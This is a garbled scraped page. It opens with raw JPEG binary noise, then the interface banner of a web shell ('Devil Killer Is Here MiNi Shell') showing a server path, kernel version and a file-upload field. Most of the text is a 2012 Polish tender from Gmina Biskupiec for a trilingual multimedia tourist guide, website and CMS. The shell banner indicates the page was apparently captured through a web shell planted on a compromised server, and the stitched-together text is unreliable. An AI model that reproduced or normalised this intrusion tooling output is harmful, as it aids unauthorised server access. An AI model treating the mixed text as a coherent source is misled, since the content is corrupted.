JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120207/31001-N-2012.html

<p class="kh_header"><b>Biskupiec: Opracowanie Multimedialnego Przewodnika po Gminie i Mieście Biskupiec oraz atrakcjach Warmii i Mazur.</b><br>
<b>Numer ogłoszenia: 31001 - 2012; data zamieszczenia: 07.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Biskupiec , al. Niepodległości 2, 11-300 Biskupiec, woj. warmińsko-mazurskie, tel. 89 7150110, faks 89 7152437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biskupiec.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Multimedialnego Przewodnika po Gminie i Mieście Biskupiec oraz atrakcjach Warmii i Mazur..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie Multimedialnego Przewodnika po Gminie i Mieście Biskupiec oraz atrakcjach Warmii i Mazur przynajmniej w technologiach i technikach wykonania podanych poniżej. 
Części składowe zamówienia wraz z opisem:
I.	OPRACOWANIE WERSJI PAPIEROWEJ PRZEWODNIKA
1.	Opracowanie tekstu do przewodnika
1.1.	Opracowanie szczegółowe, kreatywne grafiki i tekstu papierowej wersji przewodnika trójjęzycznego (polsko-angielsko-niemieckiej) p.t.: KRAJOBRAZ PEŁEN MOŻLIWOŚCI Przewodnik po mieście i gminie Biskupiec oraz atrakcjach Warmii i Mazur w formacie C5 (162mm x 229mm) około 150 stron, z materiału nie gorszego niż kreda mat 150g na m2  oprawa klejowa ze sztywną  okładką - tektura.  
1.2.	Opracowanie kreatywne tekstu przewodnika kreującego pozytywny wizerunek Miasta i Gminy Biskupiec. Przewodnik powinien zawierać interesujący, barwny opis, a układ zdjęć i tekstu na stronie powinien być ciekawy, przyciągający uwagę.
Zamawiający zastrzega sobie prawo do wnoszenia uwag i sugestii aż do uzyskania ostatecznej jego akceptacji. 

1.Foto
1.1.	Wykonawca zobowiązany jest wykonać,pozyskać zdjęcia do realizacji umowy we własnym zakresie. Ponadto Wykonawca zobowiązany jest do obróbki graficznej dostarczonych przez Zamawiającego fotografii. Przy każdym zdjęciu,grafice należy umieścić opis i dane autora lub źródło.
1.2.	Informacje umieszczane pod zdjęciami powinny być przetłumaczone na język angielski i niemiecki przez tłumacza przysięgłego.
2.Mapa miasta, Mapa gminy i okolic
2.1.	Szczegółowe i kreatywne opracowanie map z atrakcjami na terenie Miasta i Gminy Biskupiec oraz  okolicznymi atrakcjami na terenie Warmii i Mazur (np. Św. Lipka, Wilczy Szaniec, zamek w Olsztynie itp.). Wydrukowane i złożone mapy należy dołączyć do każdego egzemplarza wydrukowanego Przewodnika.
W ramach zamówienia należy opracować mapy:
mapa Miasta Biskupiec w skali 	1:7.500
Mapa Miasta powinna być podzielona na sekcje i zawierać spis nazw ulic ze wskazaniem ich lokalizacji. Ponadto należy wskazać lokalizacje instytucji publicznych, atrakcji turystycznych oraz ważniejszych obiektów (m.in. zabytkowych). 
Na rewesie mapy należy zamieścić m.in. opis atrakcji turystycznych wraz ze zdjęciami, dane statystyczne dotyczące powierzchni terenu Miasta Biskupiec, dane kontaktowe instytucji publicznych,  instytucji związanych z turystyką, kulturą i rekreacją. 
mapa Gminy Biskupiec w skali 	1:50.000
Mapa Gminy powinna być podzielona na sekcje i zawierać spis miejscowości oraz jezior ze wskazaniem ich lokalizacji. Mapa Gminy powinna uwzględniać co najmniej: szlaki komunikacyjne oraz wszystkie miejscowości, atrakcje turystyczne, trasy rowerowe opracowane w ramach niniejszej umowy.
Na rewesie mapy należy zamieścić m.in. opis atrakcji turystycznych wraz ze zdjęciami, dane statystyczne dotyczące powierzchni terenu Gminy Biskupiec, dane kontaktowe instytucji publicznych,  instytucji związanych z turystyką, kulturą i rekreacją.
mapa Warmii i Mazur w skali 	1:500.000
Mapa Warmii i Mazur powinna uwzględniać co najmniej: główne szlaki komunikacyjne, miejscowości, w których zlokalizowane są instytucje samorządowe oraz miejscowości w których znajdują się główne atrakcje regionu. 
Na rewesie mapy należy zamieścić m.in. opis atrakcji turystycznych wraz ze zdjęciami, dane statystyczne dotyczące powierzchni terenu Warmii i Mazur, dane kontaktowe instytucji publicznych,  instytucji związanych z turystyką, kulturą i rekreacją.
Wydruk na formacie A2 (420mm x 594mm), na papierze mapowym, o gramaturze nie mniejszej niż 100g na m2. Zamawiający dopuszcza nieznaczne, uzasadnione korekty formatu oraz skali map oraz treści na nich umieszczanych. Każda zmiana wymaga formy pisemnej i musi zostać zaakceptowana przez Zamawiającego. 
3.Skład wersji papierowej
3.1.Wykonawca opracuje 3 koncepcje projektu graficznego (layout), z których wybrana przez Zamawiającego zostanie jedna stanowiąca podstawę opracowania ostatecznego layoutu. Zamawiający zastrzega sobie prawo do wnoszenia uwag, sugestii i zmian do wybranej propozycji layoutu aż do uzyskania ostatecznej jego akceptacji.
Propozycje projektu graficznego muszą się znacząco od siebie różnić. Za kolejną propozycję projektu uważa się odmienną od pozostałych koncepcję, wizerunek z jednoczesną zmianą składników strony: tło (np. kolor, tekstura), czcionka, układ zdjęć.
3.2.Każda strona przewodnika wersji papierowej musi zostać zaakceptowana przez Zamawiającego poprzez zaparafowanie.
3.3.Wykonawca zobowiązany jest do dokonania wydruku próbnego i dostarczenia go do ostatecznej korekty do siedziby Zamawiającego przed zrealizowaniem całości przedmiotu zamówienia. Zamawiający wymaga również, aby po wykonaniu wydruku próbnego, ale przed realizacją całości zamówienia osoba, która z ramienia Wykonawcy będzie pilotować realizację zamówienia przybyła do siedziby Zamawiającego celem omówienia ewentualnych korekt.
3.4.Wykonawca zobowiązany jest do przekazania ostatecznej opracowanej wersji papierowej przewodnika w wersji elektronicznej na nośniku zewnętrznym umożliwiającym odczyt danych, ich edycję i druk. Liczba przekazanych nośników zewnętrznych - 3 szt. 
3.5.Wykonawca zamieści w papierowej wersji przewodnika numer ISDN, przekazany przez Zamawiającego.
3.6.Za jeden komplet przewodnika w wersji papierowej uważa się: 1 egz. przewodnika, 1 egz. mapy Miasta Biskupiec, 1 egz. mapy Gminy Biskupiec, 1 egz. mapy Warmii i Mazur.
4.Druk
4.1.Przygotowanie do druku: skład (DPT), naświetlanie (CTP) i druk w pełnym kolorze (4+4) w nakładzie 10 000 egzemplarzy przewodnika, introligatornia.
4.2.Przygotowanie do druku:  skład (DPT), naświetlanie (CTP) i druk w pełnym kolorze (4+4) w nakładzie 30 000 egzemplarzy map (10 000 egz. map Miasta Biskupiec, 10 000 egz. map Gminy Biskupiec, 10 000 egz. map Warmii i Mazur) wraz ze złożeniem umożliwiającym włożenie do opracowanej wersji papierowej przewodnika. 
5.Kolportaż
5.1.Kolportaż 500 sztuk kompletów przewodnika (wersji papierowej wraz z trzema rodzajami map) do punktów Informacji i Centrów Turystycznych oraz biur turystycznych na terenie województw: Mazowieckiego, Wielkopolskiego, Śląskiego, Lubelskiego, Warmińsko-Mazurskiego, Dolnośląskiego.
5.2.Wykonawca dostarczy Zamawiającemu do akceptacji wykaz miejsc, do których zostaną dostarczone przewodniki i mapy. Zamawiający zastrzega możliwość wnoszenia uwag do wykazu.
5.3.Zamawiający określi ilości dostarczanych egzemplarzy do wybranych miejsc.
5.4.Wykonawca przekaże Zamawiającemu potwierdzenie dostarczenia wersji papierowej oraz map przewodnika.
5.5.Dostawa i rozładunek pozostałych egzemplarzy przewodnika i map we wskazanym przez Zamawiającego miejscu i terminie w Biskupcu.
II.OPRACOWANIE WERSJI ELEKTRONICZNEJ PRZEWODNIKA
1.Wytyczne ogólne 
1.1.Opracowanie szczegółowe, kreatywne grafiki i tekstu elektronicznej wersji przewodnika trójjęzycznego (polsko-angielsko-niemieckiej) p.t.: KRAJOBRAZ PEŁEN MOŻLIWOŚCI Przewodnik po Mieście i Gminie Biskupiec oraz atrakcjach Warmii i Mazur
Zamawiający zastrzega sobie prawo do wnoszenia uwag, sugestii i zmian aż do uzyskania ostatecznej jego akceptacji. 
1.2.Elektroniczna wersja Przewodnika musi zawierać wszystkie informacje zawarte w wydawanym w wersji papierowej przewodniku oraz zostać uzupełniona o informacje graficzne, mapy, zdjęcia i opisy które nie mogły być zamieszczone, bądź nie zmieściły się w papierowej wersji Przewodnika. Wersja ta musi zawierać co najmniej 50% informacji więcej względem wersji papierowej i być bardziej szczegółowa niż wersja papierowa z zachowaniem jakości i technik zawartych w wersji papierowej. 
1.3.Elektroniczna wersja przewodnika stanowić będzie zakładkę,link Przewodnik na stronie internetowej Zamawiającego www.biskupiec.pl
2.Opracowanie strony www
2.1.Wykonawca opracuje 3 koncepcje projektu graficznego (layout), z których wybrana zostanie jedna stanowiąca podstawę opracowania ostatecznego layoutu. Zamawiający zastrzega sobie prawo do wnoszenia uwag, sugestii i zmian do wybranej propozycji layoutu aż do uzyskania ostatecznej jego akceptacji. 
Propozycje projektu graficznego muszą się znacząco od siebie różnić. Za kolejną propozycję projektu uważa się odmienną od pozostałych koncepcję, wizerunek z jednoczesną zmianą składników strony: tło (np. kolor, tekstura), czcionka, układ zdjęć.
3.Stworzenie strony www
3.1.Elektroniczna wersja Przewodnika musi zapewnić przejrzyste, proste i bezpłatne korzystanie ze wszystkich informacji zawartych na stronie. Proste i bezpłatne ich pobieranie oraz bezpłatne drukowanie dowolnego zakresu wszystkich informacji i grafik.
3.2.Kreacja i szczegółowe opracowanie graficzne i informatyczne multimedialnego przewodnika (elektronicznego) po Gminie i Mieście Biskupiec wykorzystującego najbardziej zaawansowane technologie (Internet, telefonia komórkowa i GPS) wraz z instrukcjami jak z ich korzystać, jak pobierać, drukować oraz jego wdrożenie i uruchomienie. Zakodowanie zaakceptowanych przez Zamawiającego szablonów graficznych do standardu XHTML,CSS.
3.3.Przygotowana strona powinna spełniać następujące parametry: technologia XHTLM 1.0, PHP, CGI, SQL, JAVASCRIPT, preferowane rozwiązania oparte na OPENSOURCE oraz flash 8.0 lub wyższe z odpowiednią detekcją wersji flash.
3.4.Udostępnienie strony www w publicznej sieci Internet osobom trzecim od dnia odbioru strony www przez Zamawiającego, pod adresem wskazaną przez Zamawiającego, zapewniające jednakową czytelność strony www w przeglądarkach: IE 7,8,9(beta), FireFox 9, Opera 11.0, Safari 3.0, Chrome 10 i wyższe;
3.5.Przygotowana strona www (w trzech wersjach językowych) powinna zawierać:
mapę strony
informacje o których mowa w punkcie III.1 z uwzględnieniem zakresu pkt. II.1.2 
mapy interaktywne Miasta i Gminy Biskupiec z trasami turystycznymi. Długość tras musi wynieść nie mniej niż 300 km po Gminie i Mieście Biskupiec i objąć co najmniej 150 obiektów wraz z opisami..
mapy z opracowanymi śladami GPS tras, opisami obiektów i atrakcji turystycznych. Długość tras musi wynieść nie mniej niż 300 km po Gminie i Mieście Biskupiec i objąć co najmniej 150 obiektów wraz z opisami..
galerię wybranych zdjęć (min. 30szt.). 
dane kontaktowe instytucji publicznych,  instytucji związanych z turystyką, kulturą i rekreacji
wyszukiwarkę haseł i pojęć przedstawionych na stronie www
film o Gminie Biskupiec 
panoramy 3D
mapy Miasta i Gminy Biskupiec, Warmii i Mazur opracowane w ramach wersji papierowej w wersji do odczytu (w formacie np. PDF)
opracowana wersja papierowa przewodnika (w formacie np. PDF)
link do strony www.biskupiec.pl
licznik odwiedzin strony
informację o dofinansowaniu przedsięwzięcia ze środków unijnych (oznaczenia graficzne i opisowe) oraz logotypy gminne. Logotypy gminne dostarczy Zamawiający.
4.Hosting strony www.
4.1.Hosting internetowej wersji Przewodnika. Wdrożenie na dowolnym, innym zakupionym przez Wykonawcę przestrzeni dyskowej na serwerze obsługującym technologię CMS. Bez kosztów utrzymania na serwerze przez okres trwałości projektu, tj. do dnia 31grudnia 2018 roku.
4.2.Hosting przygotowanej strony www na serwerze, którym dysponuje Wykonawca o parametrach minimalnych:
pojemność serwera - 50GB, 
roczny pakiet transferu: min. 900GB, 
bazy danych: SQL POSTGRESQL, 
skrypty: PHP CGI PERL itp. 
dostęp do serwera z zewnątrz: SSL SSH SFTP FTP, 
archiwizacja danych raz na dobę, 
backup serwera co 24h
5.System CMS
5.1.Konfiguracja i wdrożenie systemu CMS. Wypełnienie treścią serwisu (teksty, grafika). Szczegółowe opracowanie CMS do obsługi i zarządzania treścią strony przewodnikowej - zawierające m.in. możliwość edytowania położenia zdjęć, opisu atrakcji turystycznych, dodawania samodzielnego hoteli, restauracji itp. 
5.2.Podstawowe funkcjonalności systemu CMS to m.in.: obsługa poziomów dostępu dla użytkowników, tworzenie i edycja w ramach serwisu artykułów, newsów, zarządzanie i edycja galeriami zdjęć itd. Technologia PHP+mySQL+JSquery(JavaScript)+AJAX+xHTML.
5.3.Dostawa przejrzystego, funkcjonalnego systemu CMS (Content Management System = System Zarządzania Treścią), tj. zestawu aplikacji internetowych, wyposażonego w polski interfejs, pozwalającego na:
samodzielne, bieżące zarządzanie treścią i grafiką oraz ich układem, wymianę szablonów graficznych w trzech wersjach językowych (polskiej, angielskiej i niemieckiej),
przygotowanie i publikację treści w języku polskim, angielskim i niemieckim,
bieżącą aktualizację i rozbudowę strony przez osoby posiadające podstawowe umiejętności obsługi komputera, poprzez m.in. tworzenie i dodawanie nowych działów i podstron, nowych szablonów, nowych załączników, publikowanie materiałów promocyjnych w programach Word, Excel, Adobe oraz materiałów graficznych i multimedialnych, itp.,
zmianę koncepcji graficznej strony poprzez wprowadzanie do systemu szablonów graficznych, 
tworzenie szablonów stron w zakresie strukturalnym, tj. rozmieszczenie poszczególnych elementów na stronie oraz w zakresie graficznym, tj. odpowiednie uporządkowanie obiektów graficznych na stronie (obsługa tworzenia szablonu może zakładać pewien poziom wiedzy informatycznej Administratora Systemu),
dodawanie nowych działów i podstron oraz modyfikowanie i usuwanie już istniejących w sposób intuicyjny i zapewniający bezpieczeństwo dla Administratora systemu,
tworzenie dokumentów przy pomocy intuicyjnego edytora, niewymagające od redaktorów znajomości języka HTML (edytor Wysiwyg, powinien umożliwiać redaktorom wygodny mechanizm przenoszenia treści ze sformatowanych w popularnych formatach biurowych plików tekstowych, jak również edycję wstawianego dokumentu w formacie HTML),
wysyłanie newslettera biuletynu, w formacie html,
wyszukiwanie treści na stronie www,
generowania dokumentów stron w wersji do druku,
obsługę z wielu przeglądarek internetowych,
dostęp do systemu CMS z poziomu przeglądarki internetowej,
możliwość bezpiecznej autoryzacji osób uprawnionych, logujących się do niego przy pomocy przeglądarki internetowej,
równoczesną obsługę przez minimum trzy osoby,
przyznawanie uprawnień dostępu na zróżnicowanych poziomach:
Administratora systemu CMS - osobę odpowiedzialną za zarządzanie całym systemem, w tym tworzenie, edytowanie, usuwanie, publikowanie treści, grafik, załączników, działów, podstron, dodawanie i usuwanie użytkowników i nadawanie im praw dostępu,
Redaktora - osobę odpowiedzialną za tworzenie, edytowanie, usuwanie, publikowanie treści, grafik, załączników,
Osobę wprowadzającą dane - osobę odpowiedzialną za tworzenie, edytowanie, usuwanie, grafik, załączników bez prawa ich publikacji,
tworzenie statystyk - zarówno dla całej strony www, jak i poszczególnych jej działów i podstron (przynajmniej: ilość wejść na stronie, ilość indywidualnych użytkowników, rodzaj używanej przeglądarki, lokalizacja użytkowników na podstawie adresu IP) - zewnętrzne (tzn. dotyczące aktywności zewnętrznych użytkowników), jak i wewnętrzne (dotyczące aktywności administratorów i redaktorów oraz innych osób z zespołu redaktorskiego (każda strona powinna mieć swoją historię edycji). Zamawiający dopuszcza wykorzystanie systemu Google Analytics lub rozwiązań porównywalnych pod względem funkcjonalności do tego systemu, 
automatyczne udostępnianie strony www w wersji angielskiej jeśli internauta wchodzi na stronę spoza terenu Polski - na podstawie ustawień systemowych i języka przeglądarki,
tworzenie i zarządzanie repozytorium plików - dostęp do plików umieszczanych na stronie www, tj. możliwość dodawania nowych, usuwania zbędnych plików, a także podmiany plików, które powinny być gromadzone w sposób pozwalający na swobodne ich przeglądanie, katalogowanie i sortowanie,
niezawodny, bezpieczny i nieprzerwany dostęp do strony www, 
niezawodny, automatyczny system archiwizowania bazy danych.
5.4.Dostarczenie instrukcji obsługi CMS.
5.5.Dostarczenie instrukcji konfiguracji CMS.
5.6.Przeszkolenie w obsłudze CMS 3 osób wskazanych przez Zamawiającego - szkolenie zostanie przeprowadzone w Biskupcu, z wykorzystaniem infrastruktury znajdującej się w posiadaniu Zamawiającego po odbiorze systemu CMS przez Zamawiającego.
5.7.Udostępnienie CMS wskazanym przez Zamawiającego osobom.
5.8.Świadczenie usług serwisu CMS:
udzielanie porad telefonicznych osobom wskazanym przez Zamawiającego w zakresie obsługi CMS (porady udzielane będą w dni robocze tj. od poniedziałku do piątku, w godzinach 8.00 - 15.00) w okresie dwóch miesięcy  od dnia odbioru strony www i sytemu CMS przez Zamawiającego,
interwencja na usterki i błędy ujawnione w toku eksploatacji systemu CMS - nieprawidłowości w działaniu jednej lub wielu funkcji CMS, od dnia odbioru strony www i sytemu CMS przez Zamawiającego: 24 miesiące, w terminie nie późniejszym niż następnego dnia roboczego od momentu zgłoszenia błędu. Usuwanie usterek w najbliższym możliwym terminie, nie później niż w terminie 1 tygodnia. 
5.9.Udzielenie licencji dla systemu CMS, nieograniczonej czasowo i terytorialnie.
5.10.Wykonawca zobowiązany jest do przekazania opracowanej wersji elektronicznej przewodnika na nośniku zewnętrznym umożliwiającym odczyt danych, ich edycję i druk. Liczba przekazanych nośników zewnętrznych - 3 szt. 
6.Panoramy 3 D
6.1.Opracowanie 5 Panoram 3D w miejscach wskazanych przez Zamawiającego na terenie miasta i gminy Biskupiec oraz wprowadzenie ich na opracowaną przez Wykonawcę stronę www.
6.2.Panoramy 3D powinny być wykonane w sposób umożliwiający uzyskanie ostrego obrazu po jego przybliżeniu z odległości co najmniej 50m. Perspektywa musi być tak przedstawiona, aby opowiadała rzetelnemu wizerunkowi (nie do zaakceptowania będzie zauważalne oprzyrządowanie, fragmenty dachu bądź podnośnika, z którego będzie nakręcana panorama).
6.3.Wykonawca zobowiązany będzie wykonać panoramy z obiektów sakralnych oraz co najmniej 2 panoramy z podnośnika. 
6.4.Opracowane  panoramy nie mogą naruszać interesu osób trzecich. 
6.5.Każda opracowana Panorama 3D wymaga akceptacji Zamawiającego. W przypadku braku akceptacji Wykonawca zobowiązany jest do powtórnego wykonania panoramy. 
7.Film
7.1.Szczegółowe opracowanie scenariusza, nagranie promocyjnego filmu z udźwiękowieniem (muzyka)  o mieście i gminie Biskupiec (czas trwania filmu 1,5 min.) oraz wprowadzenie materiału na opracowaną przez Wykonawcę stronę www.
7.2.Wykonawca opracuje 3 propozycje wizualnej koncepcji filmu (co najmniej w formie graficznej), z których wybrana zostanie jedna stanowiąca podstawę opracowania ostatecznego filmu. Zamawiający zastrzega sobie prawo do wnoszenia uwag i sugestii zmian do wybranej propozycji aż do uzyskania ostatecznej jego akceptacji. Propozycje wizualnej koncepcji filmu muszą się znacząco od siebie różnić (np. sposobem wykonania).
8.Foto
8.1.Wykonawca zobowiązany jest wykonać zdjęcia we własnym zakresie oraz dokonać obróbki graficznej dostarczonych przez Zamawiającego fotografii.
8.2.Fotografie załączone do wersji elektronicznej przewodnika powinny mieć rozdzielczość co najmniej 300 dpi  (nie dotyczy zdjęć historycznych, których nie jest możliwe uzyskanie lepszej jakości). Zamawiający dopuszcza zmniejszenie rozdzielczości fotografii zamieszczanych na stronie internetowej dla prawidłowego jej funkcjonowania. Minimalna rozdzielczość zdjęcia zamieszczonego na stronie www powinna wynosić 1024x768 px.
9.Trasy turystyczne rowerowe 
9.1.Wykonawca zobowiązany jest przedstawić propozycję turystycznych tras rowerowych, które muszą zostać zaakceptowane przez ja Zamawiającego.
9.2.Szczegółowe opracowanie projektu graficznego tras turystycznych interaktywnych zakładającego, że po naciśnięciu na interesujący nas obiekt pojawi się jego szczegółowy opis wraz ze zdjęciami,  a po wejściu w dodatkowe menu - np. profil trasy rowerowej - turysta będzie mógł sprawdzić jakie ciekawe obiekty znajdują się na trasie, sprawdzi ile spali kalorii oraz będzie mógł dokładnie zaplanować swoją wycieczkę po Gminie i Mieście Biskupiec. Długość tras musi wynieść nie mniej niż 300 km po Gminie i Mieście Biskupiec i objąć co najmniej 150 obiektów. Należy zintegrować je z przewodnikiem elektronicznym, wprowadzić wszystkie treści na stronę, opracować ślady GPS tras, opracować opisy obiektów i atrakcji turystycznych, wraz ze zdjęciami, profilami itp.
9.3.Szczegółowe opracowanie 3 tras turystycznych, które powinny być pętlami jako warstwa do aplikacji na telefon komórkowy GPS wraz z wprowadzeniem wszystkich treści na opracowaną przez Wykonawcę stronę  www umożliwiające ich darmowe pobranie na telefon GPS. Opracowanie i zamieszczenie śladów GPS tras wraz z darmowym po stronie Zamawiającego oprogramowaniem, ewentualnymi bezterminowymi licencjami i instrukcją na stronie. 
9.4.Wykonawca zobowiązany jest umieścić opracowane trasy turystyczne na interaktywnej mapie zamieszczonej na opracowanej przez Wykonawcę stronie www.
10.Mapy
10.1.Wykonawca zobowiązany jest przedstawić propozycję map miasta i okolic, które muszą zostać zaakceptowane przez Zamawiającego.
10.2.Szczegółowe opracowanie warstw map miasta i okolic w wersji na telefon komórkowy GPS z wykorzystaniem Google Maps  lub rozwiązań porównywalnych do systemu Google Maps  pod względem jakości map i szybkości oraz stabilności działania -  wraz z wprowadzeniem wszystkich treści na stronę opracowaną przez Wykonawcę, umożliwiające ich darmowe pobranie na telefon komórkowy GPS. Opracowanie map miast i okolic na GPS wraz z darmowym po stronie Zamawiającego oprogramowaniem, ewentualnymi bezterminowymi licencjami i instrukcją na stronie. Zakres wykorzystania ww systemu w założeniu ma być źródłem map, na których zamieszczone mają być wszystkie elementy zgodnie z przedmiotem zamówienia - takie jak szlaki, punkty, obiekty itp. 
10.3.Wykonawca zobowiązany jest umieścić opracowane mapy jako interaktywne, zamieszczone na opracowanej przez Wykonawcę stronie www.
III.INFORMACJE DOTYCZĄCE OPRACOWANIA WERSJI PAPIEROWEJ i ELEKTRONICZNEJ PRZEWODNIKA
1.Wyznaczanie obiektów - 150szt
1.1.Wykonawca zobowiązany jest ustalić 150 obiektów na terenie Miasta i Gminy Biskupiec. Zakres informacji o obiektach planowany do ujęcia w papierowej i elektronicznej wersji Przewodnika to m.in.:
1)	Miasta i miejscowości
2)	Jeziora i rzeki
3)	Ulice, Aleje, Place
4)	Szlaki trasy ścieżki (rowerowe, kajakowe, piesze, turystyczne,  edukacyjne, dydaktyczne)
5)	Dane statystyczne miasta i gminy (m.in. ludności, powierzchnia itp.)
6)	Obiekty historyczne i zabytki (m.in. Szkoła polska w Stanclewie, Centrum Prus, Granica Warmii i Mazur, kapliczki),
7)	Obiekty chronione, rezerwaty, fauna i flora itp.
8)	Bitwy, fortyfikacje, muzea, 
9)	Naj (najdłuższe, najgłębsze, najwyższe, najniższe)
10)	Grody, grodziska itp.
11)	Stanowiska archeologiczne, wykopaliska, znaleziska itp.
12)	Dwory, pałace itp.
13)	Parki
14)	Punkty widokowe, wieże widokowe
15)	Schroniska młodzieżowe
16)	Kempingi, pola namiotowe
17)	Cmentarze, cmentarzyska, pojedyncze groby, kurhany itp.
18)	Kościoły, kaplice, kapliczki
19)	Zapory, śluzy, wiadukty
20)	Pomniki historyczne, pomniki przyrody
21)	Rezerwaty, użytki ekologiczne, obszary chronione itp.
